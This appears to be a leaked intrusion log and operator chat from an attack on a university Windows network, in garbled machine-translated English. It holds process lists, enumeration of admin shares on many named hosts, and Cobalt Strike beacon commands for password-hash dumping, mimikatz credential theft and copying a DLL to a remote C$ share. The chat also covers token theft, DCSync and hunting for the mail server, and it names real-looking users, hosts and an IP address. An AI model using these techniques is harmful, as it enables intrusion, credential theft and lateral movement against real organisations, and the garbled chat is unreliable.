 --- ---- ---- ---- ------- ----
 0 0 [System Process]
 4 0 System
 120 4 Registry
 476 4 smss.exe
 3280 4 Memory Compression
 624 612 csrss.exe
 704 612 wininit.exe
 812 704 services.exe
 580 812 svchost.exe
 584 812 svchost.exe
 972 812 svchost.exe
 984 812 svchost.exe
 740 984 dllhost.exe
 1748 984 RuntimeBroker.exe x64 1
 2460 984 AcrobatNotificationClient.exe x86 1 UNFCSD\N00865522
 3088 984 WmiPrvSE.exe
 3156 984 WmiPrvSE.exe
 5208,984 WmiPrvSE.exe
 5852 984 WmiPrvSE.exe
 6576 984 unsecapp.exe
 7200 984 pcaevents.exe
 8408,984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
 8460 984 LockApp.exe x64 1 UNFCSD\N00865522
 9376 984 WmiPrvSE.exe
 10068 984 WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe x64 1 UNFCSD\N00865522
 10720 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
 10996 984 ShellExperienceHost.exe x64 1 UNFCSD\N00865522
 11464 984 SearchUI.exe x64 1 UNFCSD\N00865522
 11492 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
 11724 984 YourPhone.exe x64 1 UNFCSD\N00865522
 11776 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
 12476 984 smartscreen.exe x64 1 UNFCSD\N00865522
 14220 984 SavApi.exe x86 1 UNFCSD\N00865522
 15196 984 SkypeApp.exe x64 1 UNFCSD\N00865522
 15888 984 SettingSyncHost.exe x64 1 UNFCSD\N00865522
 17600 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
 18732 984 ApplicationFrameHost.exe x64 1 UNFCSD\N00865522
 20836 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
 20896 984 backgroundTaskHost.exe x64 1 UNFCSD\N00865522
 23444 984 Microsoft.Photos.exe x64 1 UNFCSD\N00865522
 23592 984 Video.UI.exe x64 1 UNFCSD\N00865522
 25964 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
 26764 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
 32996 984 SDXHelper.exe x86 1 UNFCSD\N00865522
 63316 984 WmiPrvSE.exe
 1076 812 svchost.exe
 1096 812 svchost.exe
 1120 812 svchost.exe
 1148 812 svchost.exe
 1204 812 svchost.exe
 1212 812 svchost.exe
 1220 812 svchost.exe
 1224 812 svchost.exe
 1236 812 svchost.exe
 1240 812 svchost.exe
 1400 812 svchost.exe
 1432 812 svchost.exe
 1484 812 svchost.exe
 6916 1484 taskhostw.exe x64 1
 12896 1484 SDXHelper.exe x86 1 UNFCSD\N00865522
 30308 1484 CompatTelRunner.exe
 9076 30308 CompatTelRunner.exe
 51856 30308 conhost.exe
 41348 1484 OfficeC2RClient.exe
 1512 812 svchost.exe
 1532 812 svchost.exe
 1584 812 SEDService.exe
 1592 812 McsClient.exe
 1604 812 svchost.exe
 1652 812 svchost.exe
 1676 812 svchost.exe
 1800 812 PresentationFontCache.exe
 1804 812 svchost.exe
 1924 812 svchost.exe
 1952 812 svchost.exe
 1976 812 AGSService.exe
 2008 812 SophosCleanM.exe
 2012 812 WUDFHost.exe
 2092 812 svchost.exe
 2100 812 svchost.exe
 2112 812 svchost.exe
 2228 812 svchost.exe
 2272 812 svchost.exe
 1396 2272 sihchost.exe x64 1 UNFCSD\N00865522
 2388 812 svchost.exe
 2472 812 svchost.exe
 2592 812 svchost.exe
 2740 812 svchost.exe
 2772 812 svchost.exe
 2828 812 svchost.exe
 2912 812 hmpalert.exe
 3020 812 svchost.exe
 3076 812 HPBDSService.exe
 3164 812 nvvsvc.exe
 3172 812 nvSCPAPISvr.exe
 3204 812 svchost.exe
 3240 812 svchost.exe
 3248 812 svchost.exe
 3256 812 svchost.exe
 3316 812 igfxCUIService.exe
 3352 812 svchost.exe
 3360 812 svchost.exe
 3432 812 svchost.exe
 3448 812 OfficeClickToRun.exe
 3572 812 SavService.exe
 3628 812 HeciServer.exe
 3684 812 svchost.exe
 3688 812 svchost.exe
 3700 812 svchost.exe
 3708 812 svchost.exe
 3832 812 svchost.exe
 3856 812 svchost.exe
 3924 812 securityHealthService.exe
 3936 812 svchost.exe
 4036 812 NetworkLicenseServer.exe
 4056 812 AeXNSAgent.exe
 4064 812 AdobeUpdateService.exe
 7888 4064 Adobe Installer.exe x86 1
 4076 812 uUACTokenSvc.exe
 4084 812 AGMService.exe
 4092 812 svchost.exe
 4116 812 SMSvcHost.exe
 4124 812 SAVAdminService.exe
 4200 812 swc_service.exe
 4224 812 swi_filter.exe
 5484 4224 swi_fc.exe
 4240 812 SSPService.exe
 4248 812 swi_service.exe
 4264 812 svchost.exe
 4272 812 svchost.exe
 4288 812 svchost.exe x64 1 UNFCSD\N00865522
 4296 812 svchost.exe
 4304 812 svchost.exe
 4312 812 svchost.exe
 4320 812 svchost.exe
 4328 812 svchost.exe
 4336 812 svchost.exe
 4344 812 svchost.exe
 4352 812 svchost.exe
 4360 812 svchost.exe
 4368 812 svchost.exe
 4400 812 SophosHealth.exe
 4532 812 CptService.exe
 4580 812 svchost.exe
 4612 812 mqsvc.exe
 4808 812 McsAgent.exe
 4836 812 svchost.exe
 4920 812 escsvc64.exe
 5236 812 svchost.exe
 5380 812 svchost.exe
 5580 812 svchost.exe
 6064 812 svchost.exe
 6244 812 SMSvcHost.exe
 6276 812 SeaPort.EXE
 6520 812 svchost.exe
 6780 812 ALsvc.exe
 6824 812 CcmExec.exe
 9716 6824 SCNotification.exe x64 1 UNFCSD\N00865522
 6992 812 svchost.exe
 8372 6992 ctfmon.exe x64 1 UNFCSD\N00865522
 7564 812 DbxSvc.exe
 7688 812 svchost.exe
 8348 812 SophosSafestore64.exe
 8840 812 svchost.exe
 8884 812 sdcservice.exe
 9012 812 svchost.exe
 9368 812 jhi_service.exe
 9568 812 LMS.exe
 9732 812 svchost.exe
 9760 812 UNS.exe
 9828 812 svchost.exe
 10060 812 SgrmBroker.exe
 10112 812 SophosFS.exe
 29752 10112 SophosFileScanner.exe
 9348 29752 SophosFileScanner.exe
 10424 812 svchost.exe x64 1 UNFCSD\N00865522
 10560 812 svchost.exe
 10940 812 Ctes.exe
 22044 10940 ProviderHost.exe
 16716 22044 conhost.exe
 13384 812 svchost.exe
 13932 812 svchost.exe
 14060 812 svchost.exe
 14152 812 svchost.exe
 16408 812 svchost.exe
 17164 812 svchost.exe x64 1
 17608 812 svchost.exe
 18232 812 svchost.exe
 19872 812 uhssvc.exe
 22292 812 abtSvcHost_.exe
 23436 812 armsvc.exe
 23660 812 scheduler.exe
 9960 23660 FortiSSLVPNdaemon.exe
 12932 23660 FortiSettings.exe
 17876 23660 FortiTray.exe x64 1
 24000 23660 FCDBLog.exe
 23760 812 rpcnet.exe
 24672 812 svchost.exe
 25004 812 SophosNtpService.exe
 26528 812 svchost.exe
 26592 812 svchost.exe x64 1
 26708 812 spoolsv.exe
 27276 812 rpcld.exe
 27816 812 CtesHostSvc.exe
 28668 812 CtHWiPrvService.exe
 28864 812 policyHost.exe
 29052 812 SearchIndexer.exe
 50868 29052 SearchProtocolHost.exe
 54572 29052 SearchFilterHost.exe
 824 704 lsass.exe
 1004 704 fontdrvhost.exe
 716 696 csrss.exe
 804 696 winlogon.exe
 772 804 dwm.exe
 996 804 fontdrvhost.exe
 12304 804 cmd.exe x64 1
 30620 12304 conhost.exe x64 1 UNFCSD\N00865522
 18600 804 cmd.exe x64 1 UNFCSD\N00865522
 26296 18600 conhost.exe x64 1 UNFCSD\N00865522
 26088 804 cmd.exe x64 1 UNFCSD\N00865522
 28580 26088 conhost.exe x64 1 UNFCSD\N00865522
 27996 804 cmd.exe x64 1 UNFCSD\N00865522
 22668 27996 conhost.exe x64 1 UNFCSD\N00865522
 28844 804 logonUI.exe
 30016 804 cmd.exe x64 1 UNFCSD\N00865522
 26120 30016 conhost.exe x64 1 UNFCSD\N00865522
 27504 30016 SharpShares.exe x64 1 UNFCSD\N00865522
 9352 9336 GoogleCrashHandler.exe
 9360 9336 GoogleCrashHandler64.exe
 10460 10384 igfxEM.exe x64 1 UNFCSD\N00865522
 10484 10384 igfxHK.exe x64 1 UNFCSD\N00865522
 10576 10384 igfxTray.exe x64 1 UNFCSD\N00865522
 10664 10588 explorer.exe x64 1 UNFCSD\N00865522
 4552 10664 CCXProcess.exe x64 1 UNFCSD\N00865522
 15200 4552 node.exe x64 1 UNFCSD\N00865522
 15212 15200 conhost.exe x64 1 UNFCSD\N00865522
 11216 10664 SecurityHealthSystray.exe x64 1 UNFCSD\N00865522
 13660 10664 OneDrive.exe x86 1 UNFCSD\N00865522
 13740 10664 hppfaxprintersrv.exe x64 1 UNFCSD\N00865522
 13844 10664 Apoint.exe x64 1 UNFCSD\N00865522
 13812 13844 ApMsgFwd.exe x64 1 UNFCSD\N00865522
 14420 13844 hidfind.exe x64 1 UNFCSD\N00865522
 13896 10664 Sophos UI.exe x64 1 UNFCSD\N00865522
 14052 10664 express.exe x86 1 UNFCSD\N00865522
 16652 14052 CefSharp.BrowserSubprocess.exe x86 1 UNFCSD\N00865522
 19908 10664 Zoom.exe x86 1 UNFCSD\N00865522
 12532 19908 Zoom.exe x86 1 UNFCSD\N00865522
 12848 3200 Teams.exe x86 1 UNFCSD\N00865522
 3324 12848 Teams.exe x86 1 UNFCSD\N00865522
 6696 12848 Teams.exe x86 1 UNFCSD\N00865522
 6844 12848 Teams.exe x86 1 UNFCSD\N00865522
 16964 12848 Teams.exe x86 1 UNFCSD\N00865522
 17508,12848 Teams.exe x86 1 UNFCSD\N00865522
 24584 12848 Teams.exe x86 1 UNFCSD\N00865522
 25340 12848 Teams.exe x86 1 UNFCSD\N00865522
 33028 12848 Teams.exe x86 1 UNFCSD\N00865522
 13132 8176 dllhost.exe
 14396 14864 EEventManager.exe x86 1 UNFCSD\N00865522
 14428 14412 ApntEx.exe x64 1 UNFCSD\N00865522
 14444 14428 conhost.exe x64 1 UNFCSD\N00865522
 14972 14864 iusb3mon.exe x86 1 UNFCSD\N00865522
 15260 14864 hpwuschd2.exe x86 1 UNFCSD\N00865522
 15280 14864 jusched.exe x86 1 UNFCSD\N00865522
 17696 15280 jucheck.exe x86 1 UNFCSD\N00865522
 15308 14864 Creative Cloud.exe x64 1 UNFCSD\N00865522
 15416 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
 15492 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
 16120 15308 Adobe Desktop Service.exe x86 1 UNFCSD\N00865522
 11900 16120 CoreSync.exe x86 1 UNFCSD\N00865522
 16764 16120 Creative Cloud Helper.exe x64 1 UNFCSD\N00865522
 17360 15308 AdobeIPCBroker.exe x86 1 UNFCSD\N00865522
 25664 15308 CCLibrary.exe x64 1 UNFCSD\N00865522
 27556 25664 node.exe x64 1 UNFCSD\N00865522
 15848 27556 conhost.exe x64 1 UNFCSD\N00865522
 27656 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
 28880 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
 22540 21392 Dropbox.exe x86 1 UNFCSD\N00865522
 17332 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522
 19912 22540 Dropbox.exe x86 1 UNFCSD\N00865522
 21868 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522
 21872 22540 Dropbox.exe x86 1 UNFCSD\N00865522
 22832 1772 acrotray.exe x86 1 UNFCSD\N00865522
 27932 51660 MicrosoftEdge_X64_87.0.664.52_87.0.664.47.exe
 51156 27932 setup.exe
 22624 51156 setup.exe
``COB-62001
```
 PID PPID Name Arch Session User
 --- ---- ---- ---- ------- ----
 0 0 [System Process]
 4 0 System x64 0
 56 4 Secure System x64 0 NT AUTHORITY\SYSTEM
 112 4 Registry x64 0 NT AUTHORITY\SYSTEM
 352 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 1768 4 Memory Compression x64 0 NT AUTHORITY\SYSTEM
 528 512 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 656 512 wininit.exe x64 0 NT AUTHORITY\SYSTEM
 84 656 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0
 752 656 services.exe x64 0 NT AUTHORITY\SYSTEM
 552 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 940 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 980 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 1292 980 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1412 980 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 5832 1412 rundll32.exe x64 0 UNFCSD\n01447311
 4484 5832 cmd.exe x64 0 UNFCSD\n01447311
 1072 4484 timeout.exe x64 0 UNFCSD\n01447311
 4444 4484 conhost.exe x64 0 UNFCSD\n01447311
 2720 980 WmiPrvSE.exe x64 0 NT AUTHORITY\n0144311
 2724 980 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM
 4844 980 WmiPrvSE.exe x64 0 NT AUTHORITY/\SYSTEM
 1088 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 1108 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1184 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1200 752 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 1268 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1296 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1356 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1452 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1500 752 atiesrxx.exe x64 0 NT AUTHORITY\SYSTEM
 3292 1500 atieclxx.exe x64 1 NT AUTHORITY\SYSTEM
 1548 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1556 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1564 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1572 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 1592 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1600 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1608 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1616 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1624 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1632 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1648 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1780 752 igfxCUIService.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1832 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1916 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1956 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1968 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2024 752 CcmExec.exe x64 0 NT AUTHORITY\SYSTEM
 2128 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2136 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2164 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2208 752 svchost.exe x64 0 NT AUTHORITY/ LOCAL SERVICE
 2212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2224 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2256 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2380 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2492 752 svchost.exe x64 0 NT AUTHORITY/\LOCAL SERVICE
 2508 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2552 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2560 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2728 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2764 752 SgrmBroker.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2788 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2896 752 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
 2920 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2984 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3024 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3028 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3076 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 3156 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3224 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 3320 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 3332 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3344 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 3372 752 MsMpEng.exe x64 0 NT AUTHORITY\SYSTEM
 3412 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 3492 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 3504 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3520 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 3724 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 3904 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3924 752 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
 4000 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 4068 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 4208 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 4336 752 securityHealthService.exe x64 0 NT AUTHORITY\SYSTEM
 4400 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 4788 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 4812 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5236 752 NisSrv.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 6044 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 820 656 lsaIso.exe x64 0 NT AUTHORITY\SYSTEM
 828 656 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 672 648 csrss.exe x64 1 NT AUTHORITY\SYSTEM
 760 648 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
 76 760 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1
 1064 760 logonUI.exe x64 1 NT AUTHORITY\SYSTEM
 1216 760 dwm.exe x64 1 Window Manager\DWM-1
``get the full list of processes here,``
only on 2 windows 10
``:thinking:but he has access to the admin ball or says that the current user is not LAELWAYS spawns sessions without *she will try to do something about it about the current machine is strangecore this user has admin only on 2 windas 10enterprice (empty), on 1 servak (current machine), the other 319 are Windows education, computers in the students, they have nothing to catch it and was going to do and tell me whether there is a server OS from the old list of hosts with admin balls turns out so that now we have that yesterday's polozak?i have no usernames and passwords at all and i started reshooting the ballsvirtually 20 minutes ago i restored it via Citrix as i came with it a session hung for 8 hours i wrote that polzak session or login / pass remained? no polzak one and the same? now i will download it again, yesterday you were from there selected hosts with admin balls? i mean the previous output list was not added more job just hung everything that has collected ```
[*] Parsed 7530 computer objects.
Shares for CONDORCLUSTER:
	[--- Unreadable Shares ---]
		ClusterStorage$
		IPC$

Shares for WILDCATNEW:
	[--- Unreadable Shares ---]
		IPC$

Shares for COB-62001:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for chem-62837:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ccdc Chalk Research Group's Public Folder Chalk, Stuart's Public Folder chembl COASAdmin's Public Folder donh's Public Folder ncct nistsdm trc
Shares for CEC-59126:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ E$ F$ K$ print$
Shares for WILDCAT:
	[--- Unreadable Shares ---]
		IPC$

Shares for Coppicecluster:
	[--- Unreadable Shares ---]
		ClusterStorage$
		IPC$

Shares for ThicketA:
	[--- Unreadable Shares ---]
		IPC$

Shares for primrose:
	[--- Unreadable Shares ---]
		IPC$

Shares for hedgea:
	[--- Unreadable Shares ---]
		IPC$

Shares for ThicketB:
	[--- Unreadable Shares ---]
		IPC$

Shares for BriarA:
	[--- Unreadable Shares ---]
		IPC$

Shares for ThicketC:
	[--- Unreadable Shares ---]
		IPC$

Shares for PHYS-65427:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65428:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65430:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-63941:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65439:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65440:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65435:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65438:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-63945:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65433:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65437:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-63943:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65432:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65442:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-63947:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65441:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for PHYS-65436:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for thicketd:
	[--- Unreadable Shares ---]
		IPC$

Shares for ThicketE:
	[--- Unreadable Shares ---]
		IPC$

Shares for CEC-66268:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ Users
Shares for PHL-66859:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for CEC-63643:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for PHL-66860:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66886:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66897:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66872:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66891:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66868:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66865:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66866:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66882:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66885:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66884:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66892:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66368:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66375:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66373:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66382:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66400:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66377:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66381:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66394:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66385:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66396:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66397:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66384:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66392:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66401:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66386:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66399:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66393:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for mus-63011:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		Administrator's Public Folder Biernacki, Krzysztof's Public Folder Daugherty, John's Public Folder Hines, Clarence's Public Folder Pavlesich, Adina's Public Folder Studio Lessons's Public Folder n00865522

``Give me the whole list of npc with admin balls under the current polzacompletion on another machine in another give out but this again only in this session
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
[-] no results.
``hashdump with minus comes out but computer itself seems to be neutered in one way or another, i.e. there is output, etc.
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 438866 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
```
```
beacon> jobs
[*] Tasked beacon to list jobs
[+] host called home, sent: 8 bytes
[*] Jobs

 JID PID Description
 --- --- -----------
 17 12304 process
```
```
beacon> shell copy x64.dll \139.62.66.77\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\139.62.66.77\C$\ProgramData
[+] host called home, sent: 73 bytes
```
```
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is CA3E-DD31

 Directory of C:\ProgramData

12/02/2020 04:31 AM <DIR> %LOCALAPPDATA%
12/01/2020 04:27 PM 272 2013.par
04/07/2018 11:09 AM 35,888 3002.abs
05/02/2015 07:50 PM 15,568 3029.abs
11/11/2019 05:42 PM <DIR> ABBYY
10/12/2020 01:43 PM <DIR> Adobe
11/20/2020 09:32 AM <DIR>
``Certainly in the session from which I could not push the dailka to other computers, mimic worked with an error, google pinged, tht with the balls through the shell type output in this output is, but not from all previous after the adfynda first did not work, then broke, as if the response was just 10 minutes, although Hartbit about 3-5 seconds were you in both kobs in bicon output does not fly from the network?but i'm talking specifically about the current network, the scanners are not sleeping in the new one, which is wikibros.com, today came a lot of left-handed sessions
the previous one, which is likenic.com, went in yesterday and there were a bunch of sessions of 500-800 hours of slack I gave you the additional koba you have in both koba such anomaly arrives? by the waykoba in bl got 90%) did not come to me understood I made a case in an existing session there is a host calls home, but no output in bicon?
 in short, from that session, the call to the other computers didn't work
```
there is no output not working and i can't copy it, i can't copy from that session, i just went back to Citrix and saved myself yesterday's starting session, i'm reshooting the balloons just in case there will be more, and i can spam, waiting until one has 10 unterricks mainly windows 10 unitedcation as yesterday i have access to windows 10 unitedcation, made style token, injected into user's process, session either does not appear, or appears stillborn@tl1 so you fix it since there are system sessionsIn general, the session where there was a user I jumped out, the system remains, there is another user, now I will jump into his process and will watch the balls againl then dsync hereDCSYNC removed; looking for cloud-administration of Webroot SecureAnywhere in the spn is` >servicePrincipalName: exchangeAB/JDODC67.jdossn.local` - it is pinged. What to do with it? in ad_users there is something like ` smtp:NHNorRAremb@jdisonline.com` but `jdisonline.com` is not resolved google, hotmail, yahoo, etc.in browsers they have public servicesseka also if you took off the browsers where they have mail? or in spns can be written exchangemailEX also?  =)no one with a name that has `exc` I'll check and you see the exh server? it's a pinged list of servers and how to find it? from where i am, most of them don't seem to be visible at all did you scan the diapasons? the webserver that holds citrix authorization is VERY often not in the domain i check this 